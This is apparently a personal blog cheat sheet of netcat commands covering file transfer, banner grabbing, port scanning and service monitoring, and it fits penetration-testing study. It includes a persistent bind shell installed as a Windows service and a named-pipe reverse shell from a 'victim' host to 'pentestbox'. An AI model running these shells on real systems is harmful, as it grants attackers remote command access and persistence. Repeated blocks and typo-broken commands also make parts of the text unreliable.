how to move files between 2 systems using nc. works on both linux and windows.
#nc --lvp 2222 < sending_this_file.txt
on target/receiving machine
=========================================================
# nc [targetIP] [remote_port] => netcat client connects to a target service, and pull back its service info
(e.g. nc 1.2.3.4 21, nc 1.2.3.4 80 ; for port 80 you may have to enter HEAD / HTTP/1.0 followed by 2 enter to get a response back from the iis server.
=========================================================
# echo "" | nc -v -n -w1 [target_ip] [port_range] ; ""=means display nothing. if we dont do this echo "", our netcat client will hang on the first open port, waiting forever for standard input from the keyboard, so we purposely echo nothing to close off the standard input.
(e.g echo "" | nc -v -n -w1 1.2.3.4 1-100) (<-- this will work in reverse order and possibly slow if run between vmware sessions)
=========================================================
# nc -v -l -p [local_port] (netcat listner can recieve client browser version while listening to the port 80)
=========================================================
# while (true); do nc -vv -z -w3 [target_ip] [target_port] > /dev/null && echo -e "\x07"; sleep 1; done
<-- (monitor for target_port and beeps if port is down; (-l=client;-vv=very verbose;-z=sending no data; and waiting not more than 3 sec to make a connection to the target ip. as long as this netclient clent can make a connection successfully (&&), we want to print BEL character )
=========================================================
# while `nc -vv -z -w3 [target_ip] [target_port] > /dev/null` ; do echo "Service is ok"; sleep 1; done; echo "Service is dead"; echo -e "\x07"
<-- ( `=this is backtick, the key next to number 1 key, pressed w/o shift, prints a mesg when the service is ok and beeps when service is dead)
=========================================================
windows>nc.ex -n -vv -w3 target_ip_address 1-100
netcat port scanning (in reverse orde). -n tells netcat not to resolve names in DNS. -vv tells it be very verbose, priting information on standard error when it can make a connection on a port, as well as different message when it cannot make connection. the -w3 tells it to wait no more than 3 seconds on any port, moving on if port is open after a short pause adn giving up on closed ports after the timeout expires.
================
interact with a service
windows>sc \\hostname start service_name
windows>sc \\hostname delete service_name
windows>sc \\hostname query service_name
============
creating a service:
this will be killed after 30 sec since it does not make an API call back saying that the service started sucessfully.
windows>sc \\%computername% create ncservice2 binpath= "c:\tools\nc.exe -l -p 2222 -e cmd.exe"
==============
creating a service:
this will be killed after 30 sec since it does not make an API call back saying that the service started sucessfully. making it stick:
windows>sc \\%computername% create ncservice2 binpath= "cmd.exe /k c:\tools\nc.exe -l -p 2222 -e cmd.exe"
=============
# wc -z -vv -w 1 192.168.1.100 20-25
port scan using netcat/nc. identifying ports on a target. scanned from ports 20 through 25
=============
on source/sending machine
on target/receiving machine
#nc -nv target_ip_address 2222 > receiving_this_file.txt
Building off of the previous example, we can accomplish more useful tasks.
Because we are establishing a regular TCP connection, we can transmit just about any kind of information over that connection. It is not limited to chat messages that are typed in by a user. We can use this knowledge to turn netcat into a file transfer program.
Once again, we need to choose one end of the connection to listen for connections. However, instead of printing information onto the screen, as we did in the last example, we will place all of the information straight into a file:
- netcat -l 4444 > received_file
On the second computer, create a simple text file by typing:
- echo "Hello, this is a file" > original_file
We can now use this file as an input for the netcat connection we will establish to the listening computer. The file will be transmitted just as if we had typed it interactively:
- netcat domain.com 4444 < original_file
We can see on the computer that was awaiting a connection, that we now have a new file called "received_file" with the contents of the file we typed on the other computer:
- cat received_file
output
Hello, this is a file=========================================================
# nc [targetIP] [remote_port] => netcat client connects to a target service, and pull back its service info
(e.g. nc 1.2.3.4 21, nc 1.2.3.4 80 ; for port 80 you may have to enter HEAD / HTTP/1.0 followed by 2 enter to get a response back from the iis server.
=========================================================
# echo "" | nc -v -n -w1 [target_ip] [port_range] ; ""=means display nothing. if we dont do this echo "", our netcat client will hang on the first open port, waiting forever for standard input from the keyboard, so we purposely echo nothing to close off the standard input.
(e.g echo "" | nc -v -n -w1 1.2.3.4 1-100) (<-- this will work in reverse order and possibly slow if run between vmware sessions)
=========================================================
# nc -v -l -p [local_port] (netcat listner can recieve client browser version while listening to the port 80)
=========================================================
# while (true); do nc -vv -z -w3 [target_ip] [target_port] > /dev/null && echo -e "\x07"; sleep 1; done
<-- (monitor for target_port and beeps if port is down; (-l=client;-vv=very verbose;-z=sending no data; and waiting not more than 3 sec to make a connection to the target ip. as long as this netclient clent can make a connection successfully (&&), we want to print BEL character )
=========================================================
# while `nc -vv -z -w3 [target_ip] [target_port] > /dev/null` ; do echo "Service is ok"; sleep 1; done; echo "Service is dead"; echo -e "\x07"
<-- ( `=this is backtick, the key next to number 1 key, pressed w/o shift, prints a mesg when the service is ok and beeps when service is dead)
=========================================================
windows>nc.ex -n -vv -w3 target_ip_address 1-100
netcat port scanning (in reverse orde). -n tells netcat not to resolve names in DNS. -vv tells it be very verbose, priting information on standard error when it can make a connection on a port, as well as different message when it cannot make connection. the -w3 tells it to wait no more than 3 seconds on any port, moving on if port is open after a short pause adn giving up on closed ports after the timeout expires.
================
interact with a service
windows>sc \\hostname start service_name
windows>sc \\hostname delete service_name
windows>sc \\hostname query service_name
============
creating a service:
this will be killed after 30 sec since it does not make an API call back saying that the service started sucessfully.
windows>sc \\%computername% create ncservice2 binpath= "c:\tools\nc.exe -l -p 2222 -e cmd.exe"
==============
creating a service:
this will be killed after 30 sec since it does not make an API call back saying that the service started sucessfully. making it stick:
windows>sc \\%computername% create ncservice2 binpath= "cmd.exe /k c:\tools\nc.exe -l -p 2222 -e cmd.exe"
=============
# wc -z -vv -w 1 192.168.1.100 20-25
port scan using netcat/nc. identifying ports on a target. scanned from ports 20 through 25
=============
without e support
skodo@pentestbox# nc -nvlp 443
victim$ mknod /tmp/backpipe p
victim$ /bin/sh 0</tmp/backpipe | nc pentestbox 443 1>/tmp/backpipe
=============
scan using nc which ports are listening
-netcat -z -n -v 198.51.100.0 1-1000
- netcat -z -n -v 198.51.100.0 1-1000 2>&1 | grep opeen
-netcat -z -n -v 198.51.100.0 1-1000
- netcat -z -n -v 198.51.100.0 1-1000 2>&1 | grep opeen
Comments
Post a Comment